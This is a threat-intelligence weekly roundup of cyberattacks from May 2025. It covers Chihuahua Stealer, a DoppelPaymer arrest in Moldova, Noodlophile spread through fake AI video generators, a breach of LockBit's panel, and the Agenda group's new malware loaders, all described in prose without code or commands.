< Back
Chihuahua stealer

Tags:

Threat intelligence
14 May 2025

Weekly Summary Cyberattacks May 8-14

Chihuahua Stealer, an infostealer in PowerShell and .NET, discovered   

A new infostealer malware called Chihuahua Stealer has been detected. First identified following a post on Reddit on April 9, this malware spreads via a Google Drive document that induces the user to execute an obfuscated PowerShell script. The infection unfolds in several stages, establishing persistence through scheduled tasks that search for marker files and download additional payloads from alternate domains. The core malware, written in .NET, steals data from browsers and cryptocurrency wallet extensions. The extracted information is compressed into a “.chihuahua” file, encrypted using AES-GCM via native Windows APIs, and exfiltrated via HTTPS to a remote server. Finally, it erases its tracks to avoid detection.  

Suspect arrested in Moldova for DoppelPaymer ransomware cyberattacks   

Authorities in Moldova have arrested a 45-year-old man accused of involvement in attacks using the DoppelPaymer ransomware, which affected Dutch organizations in 2021. The arrest, carried out on May 6, included the search of his home and vehicle, where electronic devices, cash worth €84,800, and other relevant items were seized. The detainee, a foreign national, is linked to an attack against the Netherlands Research Council (NWO), which caused damages of around 4.5 million euros and forced the closure of its grant application system. Moldova has initiated proceedings for his extradition to the Netherlands. This action is part of a joint operation between Moldova and the Netherlands, as part of a wider investigation against the DoppelPaymer group, responsible for multiple attacks on businesses and critical infrastructure since 2019.  

New fake AI video generation tools spread Noodlophile malware   

Cybersecurity researchers have discovered a new malicious campaign that uses fake AI video generators to distribute a malware called Noodlophile. Websites with attractive names such as “Dream Machine”, promoted in Facebook groups, offer supposed AI-generated videos from user files, but actually deliver a compressed file with a malicious executable disguised as a video. This file, a modified version of a legitimate video editor, triggers an infection chain that culminates in the execution of Noodlophile Stealer. This malware steals credentials, cookies, tokens and cryptocurrency wallets from browsers, and exfiltrates the data through a Telegram bot. According to researchers, the malware, of Vietnamese origin, is sold on dark web forums and offered as a service. In some cases, it is combined with the XWorm Trojan, extending its spying capabilities.  

New blow to LockBit ransomware group after massive data breach   

The LockBit ransomware group has suffered a major data breach after its affiliate panel was hacked on the dark web. All admin panels were replaced with a message saying “Don't do crime CRIME IS BAD xoxo from Prague”, with a link to a downloadable MySQL database. The file, analyzed by experts, reveals nearly 60,000 bitcoin addresses, attack configurations, names of attacked companies and more than 4,400 trading messages with victims between December and April. Plain-text credentials of 75 panel users were also leaked, including striking passwords such as 'Weekendlover69'. The operator 'LockBitSupp' confirmed the incident but assured that no private keys were leaked and no information was lost. The perpetrator of the attack is still unknown, although the message matches one used in a recent hack of the Everest group. This new breach represents another blow to LockBit, which had already been partially dismantled in 2024 by the police operation Cronos.  

Agenda Ransomware Group Enhances Arsenal with SmokeLoader and NETXLOADER   

Cybersecurity researchers report that the Agenda ransomware group, also known as Qilin, has incorporated two potent malware loaders—SmokeLoader and NETXLOADER—into its attack toolkit. SmokeLoader is a well-known malware loader that facilitates the delivery of various malicious payloads, while NETXLOADER is a newer tool designed to inject malicious code into legitimate processes, aiding in evasion and persistence. The integration of these tools signifies Agenda's commitment to enhancing its malware delivery mechanisms and complicating detection efforts. The group continues to target organizations across various sectors, emphasizing the need for robust cybersecurity defenses.